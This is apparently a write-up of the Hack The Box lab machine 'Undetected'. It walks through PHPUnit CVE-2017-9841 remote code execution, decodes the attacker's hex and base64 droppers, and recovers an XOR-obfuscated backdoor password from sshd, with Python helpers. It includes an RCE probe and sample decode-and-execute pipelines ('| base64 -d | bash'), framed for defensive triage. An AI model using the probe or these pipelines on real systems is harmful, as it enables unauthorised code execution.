Undetected - [HTB]
![Cover Image for Undetected - [HTB]](/assets/images/blog/Undetected-htb/Undetected.png)

Introduction
Undetected is a machine where we follow the evidence an attacker left behind while compromising a jewellery shop server. First we enumerate the web application and its bundled PHP libraries to exploit CVE-2017-9841 in PHPUnit; then we reverse a binary the attacker dropped in order to recover a user's password; finally we analyse the backdoored sshd binary to extract the hard-coded password that gives us root.
Enumeration
As always, we start by finding every open port on the machine with Nmap.
Then we run a deeper scan against each open port to gather more information about the services behind them.
Starting with the web port, we find a jewellery store.

Looking for hostnames in the HTML source, we can collect several domains.
Once those domains are added to /etc/hosts, we can reach a second jewellery page on the same host.

Enumerating this second site, we find a /vendor folder with directory listing enabled.
Because the listing is exposed, we can see exactly which Composer packages the site ships with, and one of them is PHPUnit.

Exploitation
The bundled PHPUnit version is affected by CVE-2017-9841: its src/Util/PHP/eval-stdin.php script evaluates whatever PHP is POSTed to it, so anyone who can reach that file under /vendor gets remote code execution.
To obtain a reverse shell, we send the reverse-shell command to that endpoint as the POST body.
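Before firing a reverse shell it is worth confirming the bug with a harmless marker, so the proof does not depend on a callback working. The probe below, added here and not part of the original write-up, POSTs `<?php echo md5('marker');` to the well-known eval-stdin.php path inside /vendor and checks whether the response echoes the MD5 of the marker; only a server that actually evaluated the body can produce it. The hostname `shop.example` and the two fake transports are constructed stand-ins so the logic runs offline; against a real target the default urllib transport is used.

```python
"""Probe for CVE-2017-9841 (PHPUnit eval-stdin.php) with a harmless marker."""
import hashlib
import urllib.error
import urllib.request

# Path of the vulnerable script relative to the web root's /vendor directory.
EVAL_STDIN = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"


def build_probe(marker: str) -> tuple:
    """Return (php_body, expected_echo). The body only echoes md5(marker),
    so a match proves code execution without changing anything on the host.
    The marker must not contain a single quote."""
    expected = hashlib.md5(marker.encode()).hexdigest()
    body = f"<?php echo md5('{marker}');"
    return body, expected


def check_target(base_url: str, marker: str = "undetected-probe", transport=None) -> bool:
    """POST the probe to eval-stdin.php and report whether the server ran it.
    `transport(url, data) -> bytes` is injectable so the check can be
    exercised offline; by default plain urllib is used."""
    body, expected = build_probe(marker)
    url = base_url.rstrip("/") + EVAL_STDIN
    if transport is None:
        transport = _urllib_transport
    try:
        response = transport(url, body.encode())
    except urllib.error.URLError:
        return False
    return expected in response.decode(errors="replace")


def _urllib_transport(url: str, data: bytes) -> bytes:
    req = urllib.request.Request(url, data=data, method="POST",
                                 headers={"Content-Type": "text/plain"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


# Constructed offline stand-ins (test doubles), not real servers.
def fake_vulnerable_server(url: str, data: bytes) -> bytes:
    """Mimics eval-stdin.php for the one PHP form build_probe emits:
    it 'evaluates' the body by returning md5(marker)."""
    text = data.decode()
    prefix, suffix = "<?php echo md5('", "');"
    if url.endswith(EVAL_STDIN) and text.startswith(prefix) and text.endswith(suffix):
        marker = text[len(prefix):-len(suffix)]
        return hashlib.md5(marker.encode()).hexdigest().encode()
    return b""


def fake_patched_server(url: str, data: bytes) -> bytes:
    """A server where eval-stdin.php was removed: a 404 page, nothing echoed."""
    return b"<html><body>404 Not Found</body></html>"


if __name__ == "__main__":
    print("constructed vulnerable host:", check_target("http://shop.example", transport=fake_vulnerable_server))
    print("constructed patched host:   ", check_target("http://shop.example", transport=fake_patched_server))
```

A hit means any PHP you POST runs as the web server user, which is exactly what the reverse shell relies on; a miss usually means the file was removed, or the vendor directory is not served from the web root.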
Privilege Escalation 1
Once inside the machine, we find a binary in /var/backups that only www-data is allowed to execute.
To analyse the file, I transferred it to my Kali machine.
Running strings against the binary reveals a long hexadecimal string.
Decoding it yields a shell command that inserts a crontab entry and replaces the password hash of the user steven1.
After cracking that hash with john, we can log in as steven1.
Privilege Escalation 2
Inside /var/mail there is a message addressed to steven.
Reading the e-mail, we learn that there is a problem with the Apache server.
Listing the Apache mods-enabled directory (/etc/apache2/mods-enabled on Debian-based systems), one module stands out because its timestamp differs from all the others.
So we locate that module and transfer the shared object to our machine to analyse it in the same way.
Running strings on the shared object, we find a long base64 string.
Once decoded, it turns out to be another command: it replaces the sshd binary and then sets the new file's timestamps to match those of /usr/sbin/a2enmod, so the backdoored binary does not stand out by date. Note that this only forges the access and modification times; the inode change time (ctime, shown by stat) cannot be set that way and still reflects when the swap happened.
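Both droppers on this box hide their payload the same way: a long hex or base64 run sitting in the output of strings, which decodes to a shell command. The script below, an added example rather than anything from the original write-up, automates that triage: it scans strings output for long hex and base64 runs, decodes each one, and keeps only results that decode to mostly printable text, so binary junk that merely looks like base64 is discarded. The sample strings output and the two encoded commands in it are constructed for the example, not the ones found on the machine.

```python
"""Find long hex or base64 runs in `strings` output and decode them."""
import base64
import binascii
import re
from typing import List, Optional, Tuple

HEX_RUN = re.compile(r"(?:[0-9a-fA-F]{2}){24,}")   # 24 or more hex-encoded bytes
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")   # 32 or more base64 characters


def decode_hex(blob: str) -> Optional[bytes]:
    try:
        return bytes.fromhex(blob)
    except ValueError:
        return None


def decode_b64(blob: str) -> Optional[bytes]:
    padded = blob + "=" * (-len(blob) % 4)   # restore '=' padding strings may have dropped
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (or tab/newline/CR)."""
    if not data:
        return 0.0
    good = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return good / len(data)


def extract_blobs(strings_output: str, min_printable: float = 0.9) -> List[Tuple[str, str]]:
    """Return (encoding, decoded_text) for every run that decodes to mostly
    printable bytes, in the order the runs appear."""
    found: List[Tuple[str, str]] = []
    for line in strings_output.splitlines():
        for m in HEX_RUN.finditer(line):
            data = decode_hex(m.group(0))
            if data is not None and printable_ratio(data) >= min_printable:
                found.append(("hex", data.decode("ascii", errors="replace")))
        for m in B64_RUN.finditer(line):
            run = m.group(0)
            if HEX_RUN.fullmatch(run):
                continue   # a pure hex run was already handled above
            data = decode_b64(run)
            if data is not None and printable_ratio(data) >= min_printable:
                found.append(("base64", data.decode("ascii", errors="replace")))
    return found


# Constructed sample modelled on `strings` output. The embedded commands are
# made up for this example; they are not the attacker's real payloads.
HEX_CMD = "echo 'constructed hex payload' > /tmp/demo-hex"
B64_CMD = "bash -c 'echo constructed base64 payload > /tmp/demo-b64'"
SAMPLE_STRINGS = "\n".join([
    "/lib64/ld-linux-x86-64.so.2",
    "libc.so.6",
    "system",
    "echo " + HEX_CMD.encode().hex() + " | xxd -r -p | bash",
    "GCC: (Debian 10.2.1-6) 10.2.1 20210110",
    "echo " + base64.b64encode(B64_CMD.encode()).decode() + " | base64 -d | bash",
])

if __name__ == "__main__":
    for encoding, text in extract_blobs(SAMPLE_STRINGS):
        print(f"[{encoding}] {text}")
```

In practice you would feed it the real output (`strings -n 8 suspicious.bin`) and read every decoded line before running anything: the decoded command is the attacker's persistence logic, and it is what tells you which accounts, cron entries and binaries to check next.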
Analysing the replaced sshd binary with Ghidra, we find an auth_function routine.

This function contains a hard-coded, obfuscated password that grants root access to the machine over SSH.

The obfuscation is nothing more than a single-byte XOR with 0x96.
The decompiler shows the password as a series of 64-bit constants; because they are stored little-endian, each 8-byte group reads backwards as printed, so after reordering the bytes we can decode the password with CyberChef.
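The same recovery in code, added here as an example and not taken from the write-up: the constants are packed little-endian into a byte string, XORed with 0x96, and cut at the C string terminator. The sample constants are constructed (`0xb7f3fae6fbf7eed3` is "Example!" XORed with 0x96, followed by "pw" and zero padding) rather than the values from the machine, and `encode_password` exists only to build such samples. Reading the hex digits of a constant left to right would give the characters of each group reversed, which is the little-endian pitfall the text refers to.

```python
"""Recover a password stored as little-endian 64-bit constants XORed with one byte."""
import struct
from typing import List

KEY = 0x96   # the single-byte XOR key used by the backdoor's auth_function


def qwords_to_bytes(qwords: List[int]) -> bytes:
    """Lay the constants out as they sit in memory: each 64-bit value is
    little-endian, so the byte the decompiler prints last comes first."""
    return b"".join(struct.pack("<Q", q) for q in qwords)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def decode_password(qwords: List[int], key: int = KEY) -> str:
    """XOR-decode and stop at the string terminator. Zero padding that was
    never XORed decodes to the key byte, so stop at either NUL or the key."""
    out = bytearray()
    for b in xor_bytes(qwords_to_bytes(qwords), key):
        if b == 0 or b == key:
            break
        out.append(b)
    return out.decode("ascii")


def encode_password(password: str, key: int = KEY) -> List[int]:
    """Reverse transformation, used here only to build constructed samples:
    pad to 8 bytes, XOR, and split into little-endian 64-bit constants."""
    raw = password.encode("ascii")
    raw += b"\x00" * (-len(raw) % 8)
    enc = xor_bytes(raw, key)
    return [struct.unpack("<Q", enc[i:i + 8])[0] for i in range(0, len(enc), 8)]


# Constructed constants, written the way the decompiler shows them. Not the
# values from the machine: "Example!" XOR 0x96, then "pw" plus zero padding.
SAMPLE_QWORDS = [0xb7f3fae6fbf7eed3, 0xe1e6]

if __name__ == "__main__":
    print(decode_password(SAMPLE_QWORDS))   # Example!pw
```

To use it on the real binary, copy the constants from the decompiled auth_function in the order they are written to the stack and drop them into the list; the only thing that usually needs adjusting is whether padding bytes were XORed too, which the terminator check above already covers.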
Finally, we become root by connecting to the machine over SSH with that password.